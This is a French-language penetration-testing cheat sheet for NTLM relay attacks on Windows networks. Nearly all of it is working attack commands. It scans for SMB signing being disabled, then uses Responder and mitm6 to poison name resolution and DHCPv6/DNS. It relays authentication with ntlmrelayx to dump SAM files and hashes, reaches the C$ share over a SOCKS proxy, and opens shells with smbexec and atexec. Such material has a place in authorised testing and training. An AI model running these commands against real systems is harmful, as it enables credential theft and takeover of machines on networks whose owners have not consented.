Vulnérable si la signature des messages est désactivé
# nmap -n -Pn -p 445 --script smb-security-mode 192.168.2.0/24
Désactiver SMB et HTTP dans Responder.conf et démarrer Responder
# python2 Responder.py -I eth0 -r -d -w
Créer un relai vers le serveur cible avec ntlmrelayx (impacket tools) et extraire le fichier SAM
# ./ntlmrelayx.py -smb2support -t smb://192.168.2.64
Obtenir une liste de target
# CrackMapExec smb <networkIP>/<cidr> --gen-relay-list targets.txt
Créer un relai en utilisant un socks proxy:
# ./ntlmrelayx.py -tf targets.txt -smb2support -socks
Pour retrouverr la liste des sessions
# ntlmrelayx> socks
Nous pouvons aussi abuser du protocole IPV6. L’idée est de répliquer aux requêtes DHCPv6 des machines du réseau pour définir le serveur DNS avec le IP de l’attaquant pour forcer les victimes à s’identifier avec la machine de l’attaquant (IPv6 est prioritaire à IPv4 sur Windows)
# sudo mitm6 -d <domain>
Configure ProxyChains
# vi /etc/proxychains.conf
mettre socks4 127.0.0.1 1080 dans le fichier
Retrouver les hashes locaux de la cible (n’importe quoi comme mot de passe)
# proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230
Accéder aux fichiers via le SOCKS Proxy
# proxychains smbclient -m smb3 '\\192.168.0.3\C$' -W theworkgroup -U Administrator%invalidPwd
Obtenir un shell
# proxychains smbexec.py <domain>/<relayedUser>@192.168.10.60
ou
# proxychains atexec.py <domain>/<relayedUser>@192.168.10.60
Plusieurs autres protocoles peuvent être relayés: imap, ldap, mssql